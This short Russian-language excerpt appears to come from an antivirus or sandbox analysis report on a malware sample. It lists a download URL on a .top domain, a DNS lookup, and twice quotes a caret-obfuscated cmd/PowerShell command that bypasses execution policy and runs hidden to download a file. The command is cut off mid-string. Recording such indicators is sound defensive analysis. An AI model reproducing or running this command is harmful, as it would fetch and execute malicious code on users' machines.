Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowER^sHEL^l.Exe -^ex^e^c^ut^IO^n^Po^Li^cY^ B^Y^pAS^S ^-nOp^RoFiLe -^WI^nDo^w^STy^le ^hi^Dd^e^n^ (N^e^W-oBJE^c^T sYSTE^M^.Ne^t.W^EbclI^E^nT)^.DO^w^N^LoaDF^iL^e('http://toagoore...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "PowER^sHEL^l.Exe -^ex^e^c^ut^IO^n^Po^Li^cY^ B^Y^pAS^S ^-nOp^RoFiLe -^WI^nDo^w^STy^le ^hi^Dd^e^n^ (N^e^W-oBJE^c^T sYSTE^M^.Ne^t.W^EbclI^E^nT)^.DO^w^N^LoaDF^iL^e('http://toagoore...' (со скрытым окном)